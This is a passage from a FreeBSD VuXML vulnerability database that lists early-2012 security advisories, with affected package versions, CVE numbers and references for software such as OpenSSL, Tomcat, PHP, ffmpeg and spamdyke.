<url>http://www.wireshark.org/security/wnpa-sec-2012-02.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-03.html</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6663</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6666</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6667</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6668</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6669</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6670</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6634</url>
<url>https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6391</url>
</references>
<dates>
<discovery>2010-01-10</discovery>
<entry>2012-01-23</entry>
</dates>
</vuln>
<vuln vid="7d2336c2-4607-11e1-9f47-00e0815b8da8">
<topic>spamdyke -- Buffer Overflow Vulnerabilities</topic>
<affects>
<package>
<name>spamdyke</name>
<range><lt>4.3.0</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia reports:</p>
<blockquote cite="http://www.spamdyke.org/documentation/Changelog.txt">
<p>Fixed a number of very serious errors in the usage of
snprintf()/vsnprintf().</p>
<p>The return value was being used as the length of the string
printed into the buffer, but the return value really indicates
the length of the string that *could* be printed if the buffer
were of infinite size. Because the returned value could be
larger than the buffer's size, this meant remotely exploitable
buffer overflows were possible, depending on spamdyke's
configuration.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0802</cvename>
<url>https://secunia.com/advisories/47548/</url>
<url>http://www.spamdyke.org/documentation/Changelog.txt</url>
</references>
<dates>
<discovery>2012-01-15</discovery>
<entry>2012-01-23</entry>
</dates>
</vuln>
<vuln vid="5c5f19ce-43af-11e1-89b4-001ec9578670">
<topic>OpenSSL -- DTLS Denial of Service</topic>
<affects>
<package>
<name>openssl</name>
<range><lt>1.0.0_9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The OpenSSL Team reports:</p>
<blockquote cite="http://www.openssl.org/news/secadv_20120118.txt">
<p>A flaw in the fix to CVE-2011-4108 can be exploited in a
denial of service attack. Only DTLS applications using OpenSSL
1.0.0f and 0.9.8s are affected.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0050</cvename>
<url>http://www.openssl.org/news/secadv_20120118.txt</url>
</references>
<dates>
<discovery>2012-01-18</discovery>
<entry>2012-01-20</entry>
</dates>
</vuln>
<vuln vid="dd698b76-42f7-11e1-a1b6-14dae9ebcf89">
<topic>asterisk -- SRTP Video Remote Crash Vulnerability</topic>
<affects>
<package>
<name>asterisk18</name>
<range><lt>1.8.8.2</lt></range>
</package>
<package>
<name>asterisk10</name>
<range><lt>10.0.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="http://downloads.asterisk.org/pub/security/AST-2012-001.html">
<p>An attacker attempting to negotiate a secure video stream can
crash Asterisk if video support has not been enabled and the
res_srtp Asterisk module is loaded.</p>
</blockquote>
</body>
</description>
<references>
<url>http://downloads.asterisk.org/pub/security/AST-2012-001.html</url>
</references>
<dates>
<discovery>2012-01-15</discovery>
<entry>2012-01-20</entry>
<modified>2013-06-19</modified>
</dates>
</vuln>
<vuln vid="7f5ccb1d-439b-11e1-bc16-0023ae8e59f0">
<topic>tomcat -- Denial of Service</topic>
<affects>
<package>
<name>tomcat</name>
<range><gt>5.5.0</gt><lt>5.5.35</lt></range>
</package>
<package>
<name>tomcat</name>
<range><gt>6.0.0</gt><lt>6.0.34</lt></range>
</package>
<package>
<name>tomcat</name>
<range><gt>7.0.0</gt><lt>7.0.23</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Tomcat security team reports:</p>
<blockquote cite="http://tomcat.apache.org/security-5.html#Fixed_in_Apache_Tomcat_5.5.35">
<p>Analysis of the recent hash collision vulnerability identified
unrelated inefficiencies with Apache Tomcat's handling of large
numbers of parameters and parameter values. These inefficiencies
could allow an attacker, via a specially crafted request, to
cause large amounts of CPU to be used which in turn could create
a denial of service. The issue was addressed by modifying the
Tomcat parameter handling code to efficiently process large
numbers of parameters and parameter values.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0022</cvename>
<url>http://tomcat.apache.org/security-5.html#Fixed_in_Apache_Tomcat_5.5.35</url>
<url>http://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.34</url>
<url>http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.23</url>
</references>
<dates>
<discovery>2011-10-21</discovery>
<entry>2012-01-17</entry>
</dates>
</vuln>
<vuln vid="1ac858b0-3fae-11e1-a127-0013d3ccd9df">
<topic>OpenTTD -- Denial of service (server) via slow read attack</topic>
<affects>
<package>
<name>openttd</name>
<range><ge>0.3.5</ge><lt>1.1.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The OpenTTD Team reports:</p>
<blockquote cite="http://security.openttd.org/en/CVE-2012-0049">
<p>Using a slow read type attack it is possible to prevent anyone
from joining a server with virtually no resources. Once
downloading the map no other downloads of the map can start, so
downloading really slowly will prevent others from joining.
This can be further aggravated by the pause-on-join setting in
which case the game is paused and the players cannot continue
the game during such an attack. This attack requires that the
user is not banned and passes the authorization to the server,
although for many servers there is no server password and thus
authorization is easy.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0049</cvename>
<url>http://security.openttd.org/en/CVE-2012-0049</url>
</references>
<dates>
<discovery>2012-01-06</discovery>
<entry>2012-01-16</entry>
</dates>
</vuln>
<vuln vid="91be81e7-3fea-11e1-afc7-2c4138874f7d">
<topic>Multiple implementations -- DoS via hash algorithm collision</topic>
<affects>
<package>
<name>jruby</name>
<range><lt>1.6.5.1</lt></range>
</package>
<package>
<name>ruby</name>
<name>ruby+nopthreads</name>
<name>ruby+nopthreads+oniguruma</name>
<name>ruby+oniguruma</name>
<range><lt>1.8.7.357,1</lt></range>
</package>
<package>
<name>rubygem-rack</name>
<range><lt>1.3.6,3</lt></range>
</package>
<package>
<name>v8</name>
<range><lt>3.8.5</lt></range>
</package>
<package>
<name>redis</name>
<range><le>2.4.6</le></range>
</package>
<package>
<name>node</name>
<range><lt>0.6.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>oCERT reports:</p>
<blockquote cite="http://www.ocert.org/advisories/ocert-2011-003.html">
<p>A variety of programming languages suffer from a denial-of-service
(DoS) condition against storage functions of key/value pairs in
hash data structures, the condition can be leveraged by exploiting
predictable collisions in the underlying hashing algorithms.</p>
<p>The issue finds particular exposure in web server applications
and/or frameworks. In particular, the lack of sufficient limits
for the number of parameters in POST requests in conjunction with
the predictable collision properties in the hashing functions of
the underlying languages can render web applications vulnerable
to the DoS condition. The attacker, using specially crafted HTTP
requests, can lead to a 100% of CPU usage which can last up to
several hours depending on the targeted application and server
performance, the amplification effect is considerable and
requires little bandwidth and time on the attacker side.</p>
<p>The condition for predictable collisions in the hashing functions
has been reported for the following language implementations:
Java, JRuby, PHP, Python, Rubinius, Ruby. In the case of the
Ruby language, the 1.9.x branch is not affected by the
predictable collision condition since this version includes a
randomization of the hashing function.</p>
<p>The vulnerability outlined in this advisory is practically
identical to the one reported in 2003 and described in the paper
Denial of Service via Algorithmic Complexity Attacks which
affected the Perl language.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4838</cvename>
<cvename>CVE-2011-4815</cvename>
<cvename>CVE-2011-5036</cvename>
<cvename>CVE-2011-5037</cvename>
<url>http://www.ocert.org/advisories/ocert-2011-003.html</url>
<url>http://www.nruns.com/_downloads/advisory28122011.pdf</url>
</references>
<dates>
<discovery>2011-12-28</discovery>
<entry>2012-01-16</entry>
<modified>2012-01-20</modified>
</dates>
</vuln>
<vuln vid="ea2ddc49-3e8e-11e1-8095-5404a67eef98">
<topic>ffmpeg -- multiple vulnerabilities</topic>
<affects>
<package>
<name>ffmpeg</name>
<range><lt>0.7.11,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Ubuntu Security Notice USN-1320-1 reports:</p>
<blockquote cite="http://www.ubuntu.com/usn/usn-1320-1">
<p>Phillip Langlois discovered that FFmpeg incorrectly handled
certain malformed QDM2 streams. If a user were tricked into opening
a crafted QDM2 stream file, an attacker could cause a denial of
service via application crash, or possibly execute arbitrary code
with the privileges of the user invoking the program.
(CVE-2011-4351)</p>
<p>Phillip Langlois discovered that FFmpeg incorrectly handled
certain malformed VP3 streams. If a user were tricked into opening
a crafted file, an attacker could cause a denial of service via
application crash, or possibly execute arbitrary code with the
privileges of the user invoking the program. (CVE-2011-4352)</p>
<p>Phillip Langlois discovered that FFmpeg incorrectly handled
certain malformed VP5 and VP6 streams. If a user were tricked into
opening a crafted file, an attacker could cause a denial of service
via application crash, or possibly execute arbitrary code with the
privileges of the user invoking the program. (CVE-2011-4353)</p>
<p>It was discovered that FFmpeg incorrectly handled certain
malformed VMD files. If a user were tricked into opening a crafted
VMD file, an attacker could cause a denial of service via
application crash, or possibly execute arbitrary code with the
privileges of the user invoking the program. (CVE-2011-4364)</p>
<p>Phillip Langlois discovered that FFmpeg incorrectly handled
certain malformed SVQ1 streams. If a user were tricked into opening
a crafted SVQ1 stream file, an attacker could cause a denial of
service via application crash, or possibly execute arbitrary code
with the privileges of the user invoking the program.
(CVE-2011-4579)</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4351</cvename>
<cvename>CVE-2011-4352</cvename>
<cvename>CVE-2011-4353</cvename>
<cvename>CVE-2011-4364</cvename>
<cvename>CVE-2011-4579</cvename>
<url>http://www.ubuntu.com/usn/usn-1320-1</url>
</references>
<dates>
<discovery>2011-09-14</discovery>
<entry>2012-01-14</entry>
</dates>
</vuln>
<vuln vid="78cc8a46-3e56-11e1-89b4-001ec9578670">
<topic>OpenSSL -- multiple vulnerabilities</topic>
<affects>
<package>
<name>openssl</name>
<range><lt>1.0.0_8</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The OpenSSL Team reports:</p>
<blockquote cite="http://openssl.org/news/secadv_20120104.txt">
<p>6 security flaws have been fixed in OpenSSL 1.0.0f:</p>
<p>If X509_V_FLAG_POLICY_CHECK is set in OpenSSL 0.9.8,
then a policy check failure can lead to a double-free.</p>
<p>OpenSSL prior to 1.0.0f and 0.9.8s failed to clear the
bytes used as block cipher padding in SSL 3.0 records.
As a result, in each record, up to 15 bytes of
uninitialized memory may be sent, encrypted, to the SSL
peer. This could include sensitive contents of
previously freed memory.</p>
<p>RFC 3779 data can be included in certificates, and if
it is malformed, may trigger an assertion failure.
This could be used in a denial-of-service attack.</p>
<p>Support for handshake restarts for server gated
cryptograpy (SGC) can be used in a denial-of-service
attack.</p>
<p>A malicious TLS client can send an invalid set of GOST
parameters which will cause the server to crash due to
lack of error checking. This could be used in a
denial-of-service attack.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4108</cvename>
<cvename>CVE-2011-4109</cvename>
<cvename>CVE-2011-4576</cvename>
<cvename>CVE-2011-4577</cvename>
<cvename>CVE-2011-4619</cvename>
<cvename>CVE-2012-0027</cvename>
<url>http://openssl.org/news/secadv_20120104.txt</url>
</references>
<dates>
<discovery>2012-01-04</discovery>
<entry>2012-01-14</entry>
</dates>
</vuln>
<vuln vid="1800886c-3dde-11e1-89b4-001ec9578670">
<topic>isc-dhcp-server -- DoS in DHCPv6</topic>
<affects>
<package>
<name>isc-dhcp42-server</name>
<range><lt>4.2.3_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://www.isc.org/software/dhcp/advisories/cve-2011-4868">
<p>Due to improper handling of a DHCPv6 lease structure, ISC DHCP
servers that are serving IPv6 address pools AND using Dynamic
DNS can encounter a segmentation fault error while updating lease
status under certain conditions.</p>
<p>The potential exists for this condition to be intentionally
triggered, resulting in effective denial of service to
clients expecting service from the affected server.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4868</cvename>
<url>https://www.isc.org/software/dhcp/advisories/cve-2011-4868</url>
</references>
<dates>
<discovery>2012-01-13</discovery>
<entry>2012-01-13</entry>
</dates>
</vuln>
<vuln vid="3338f87c-3d5f-11e1-a00a-000c6eb41cf7">
<topic>PowerDNS -- Denial of Service Vulnerability</topic>
<affects>
<package>
<name>powerdns</name>
<name>powerdns-devel</name>
<range><lt>3.0.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PowerDNS Team reports:</p>
<blockquote cite="http://www.powerdns.com/news/powerdns-security-advisory-2012-01.html">
<p>Using well crafted UDP packets, one or more PowerDNS servers
could be made to enter a tight packet loop, causing temporary
denial of service.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0206</cvename>
</references>
<dates>
<discovery>2012-01-10</discovery>
<entry>2012-01-12</entry>
</dates>
</vuln>
<vuln vid="d3921810-3c80-11e1-97e8-00215c6a37bb">
<topic>php -- multiple vulnerabilities</topic>
<affects>
<package>
<name>php5</name>
<name>php5-exif</name>
<range><lt>5.3.9</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_5</lt></range>
</package>
<package>
<name>php52-exif</name>
<range><lt>5.2.17_6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>php development team reports:</p>
<blockquote cite="http://www.php.net/archive/2012.php#id2012-01-11-1">
<p>Security Enhancements and Fixes in PHP 5.3.9:</p>
<ul>
<li>Added max_input_vars directive to prevent attacks
based on hash collisions. (CVE-2011-4885)</li>
<li>Fixed bug #60150 (Integer overflow during the parsing
of invalid exif header). (CVE-2011-4566)</li>
</ul>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4566</cvename>
<cvename>CVE-2011-4885</cvename>
<url>http://www.nruns.com/_downloads/advisory28122011.pdf</url>
</references>
<dates>
<discovery>2011-12-29</discovery>
<entry>2012-01-11</entry>
<modified>2012-01-19</modified>
</dates>
</vuln>
<vuln vid="e7fd27b2-3ae9-11e1-8b5c-00262d5ed8ee">
<topic>torcs -- untrusted local library loading</topic>
<affects>
<package>
<name>torcs</name>
<range><lt>1.3.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>TORCS News reports:</p>
<blockquote cite="http://torcs.sourceforge.net/index.php?name=News&amp;file=article&amp;sid=77">
<p>An insecure change to LD_LIBRARY_PATH allows loading of libraries
in directories other than the standard paths. This can be a
problem when downloading and installing untrusted content from the
Internet.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2010-3384</cvename>
<url>http://torcs.sourceforge.net/index.php?name=News&amp;file=article&amp;sid=77</url>
<url>http://sourceforge.net/tracker/index.php?func=detail&amp;aid=3089384&amp;group_id=3777&amp;atid=103777</url>
</references>
<dates>
<discovery>2010-10-20</discovery>
<entry>2012-01-09</entry>
</dates>
</vuln>
<vuln vid="a47af810-3a17-11e1-a1be-00e0815b8da8">
<topic>spamdyke -- STARTTLS Plaintext Injection Vulnerability</topic>
<affects>
<package>
<name>spamdyke</name>
<range><lt>4.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia reports:</p>
<blockquote cite="http://secunia.com/advisories/47435/">
<p>The vulnerability is caused due to the TLS implementation not
properly clearing transport layer buffers when upgrading from
plaintext to ciphertext after receiving the "STARTTLS" command.
This can be exploited to insert arbitrary plaintext data (e.g.
SMTP commands) during the plaintext phase, which will then be
executed after upgrading to the TLS ciphertext phase.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0070</cvename>
<url>http://secunia.com/advisories/47435/</url>
<url>http://www.spamdyke.org/documentation/Changelog.txt</url>
</references>
<dates>
<discovery>2012-01-04</discovery>
<entry>2012-01-08</entry>
<modified>2012-01-23</modified>
</dates>
</vuln>
<vuln vid="0c7a3ee2-3654-11e1-b404-20cf30e32f6d">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>2.4.*</ge><lt>3.6.7</lt></range>
<range><ge>4.0.*</ge><lt>4.0.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>A Bugzilla Security Advisory reports:</p>
<blockquote cite="http://www.bugzilla.org/security/3.4.12/">
<p>The following security issues have been discovered in Bugzilla:</p>
<ul>
<li>Tabular and graphical reports, as well as new charts have
a debug mode which displays raw data as plain text. This
text is not correctly escaped and a crafted URL could use
this vulnerability to inject code leading to XSS.</li>
<li>The User.offer_account_by_email WebService method ignores
the user_can_create_account setting of the authentication
method and generates an email with a token in it which the
user can use to create an account. Depending on the
authentication method being active, this could allow the
user to log in using this account.
Installations where the createemailregexp parameter is
empty are not vulnerable to this issue.</li>
<li>The creation of bug reports and of attachments is not
protected by a token and so they can be created without the
consent of a user if the relevant code is embedded in an
HTML page and the user visits this page. This behavior was
intentional to let third-party applications submit new bug
reports and attachments easily. But as this behavior can be
abused by a malicious user, it has been decided to block
submissions with no valid token starting from version 4.2rc1.
Older branches are not patched to not break these third-party
applications after the upgrade.</li>
</ul>
<p>All affected installations are encouraged to upgrade as soon
as possible.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3657</cvename>
<cvename>CVE-2011-3667</cvename>
<cvename>CVE-2011-3668</cvename>
<cvename>CVE-2011-3669</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=697699</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=711714</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=703975</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=703983</url>
</references>
<dates>
<discovery>2011-11-28</discovery>
<entry>2012-01-05</entry>
</dates>
</vuln>
Reference in New Issue View Git Blame Copy Permalink